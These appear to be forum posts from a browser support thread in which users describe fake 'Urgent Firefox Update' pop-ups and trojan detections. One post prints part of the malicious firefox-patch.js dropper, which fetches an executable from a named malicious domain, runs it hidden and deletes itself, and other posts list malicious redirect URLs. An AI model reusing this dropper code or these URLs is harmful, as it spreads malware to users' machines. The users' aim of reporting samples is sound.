I took a screenshot if you're interested, and tried reporting to your legal/fraud department per your online form but after submitting got Firefox message 413 Request Entity too Large.

My question is, does anyone know how to get rid of it?

Note: Upload image is not working today.

I have periodically gotten a full screen page with the Firefox logo indicating that I need to download/install an urgent update. Today it appeared on cnn.com while I was reading the page and before I clicked anything. I closed the page with the red "X" without incident and ran a Malwarebytes scan immediately afterward without result. Is this a problem Firefox has been subjected to?

Starting around the beginning of this month (July) I get prompted once a day or so to update Firefox. Each day is a different link, I know it isn't Firefox actually trying to update. I've seen many other people voicing the same concerns. I've run Malwarebytes and Windows Defender and they haven't found anything. The first time this popped up earlier this month, Windows Defender activated saying it had blocked malware: trojan/kovner if I remember correctly. It doesn't matter what site I'm on, usually just browsing Reddit non external links. Once a day. I took a screenshot of the site of the day (July 13th around 3am) early this morning and will add it to the post.

I have a .js file and .dat file that I snagged when a Urgent Firefox Update message popped up. This urgent update looked very Firefox Official. I noticed the redirect URL and it was: https://queidwhoreslag.net/9751229892037/e9e0075191d8aac19e485315d1b67c26.html. So I saved the .js file on one of my other computers and snagged some other stuff from their API. I have the malware code that is Firefox directed. Just need to know where to send the compressed files. Below is a glimpse at some of the .js code:

url='https://queidwhoreslag.net/10/524.dat';

fname=b.GetSpecialFolder(2)+'\\1e90999f64aa011197bfdf7c1792c61b.exe';
for(var i=1;i<=5;i++)
{

try { c.open('GET', url, false); c.send(null); break; }

    catch(e){

WScript.Sleep(5000); }

}
d.Open;
d.Type = 1;
d.Write(c.ResponseBody);
d.Position=0;
if (b.Fileexists(fname))b.DeleteFile(fname);
d.SaveToFile(fname);
a.run('cmd.exe /c "'+fname+'"',0,false);
var p = WScript.ScriptFullName;
if (b.FileExists(p))b.DeleteFile(p);
WScript.Echo('Update complete.');
} catch (e) {}

Almost every time I am on Facebook and click on Farmville to play that game, the first time I click on to go to my farm, I've been getting the "official-looking" red firefox screen and logo pop up with a gray colored pop up box that says it's an urgent firefox update. I've never clicked on the save button, I alwasy click cancel, close the pop up box, go back to Facebook and click on Farmville again, and everything runs fine, The latest one I encountered says it was a Java script coming from the following link, again it popped up after I logged into Facebook, and clicked on Farmville. Here's the link and file info: Urgent firefox update firefox-patch.js JavaScript File (2.6 KB) from https://podaimt2.net https://podaimt2.net/4761283090238/bea2ae3697608b4f8ce3a682c30d7e46.html

Strongly desired is a 'verification' of programs loaded vs mozilla copy. This to suppliment 'you are on the latest release.' Reasoning is lately when a web page is replaced by 'update firefox' orange screen and a pop-up of 'opening firefox-patch.exe' which wants to save a binary file. But it is not a FF patch. The result could be malware. Months ago I fell for this ploy, or a similar FLASH update and endured problems (ie, svchost.exe running taking 50% of my CPU all the time.)

Might be caused by a rotating 'ad' related, or that FLASH is blocked, or maybe html5 is running. Unknown. I have other notes. PS windows security essentials finds a trojan KIVTER in my temp file soon thereafter. I don't know where it is stored after that.
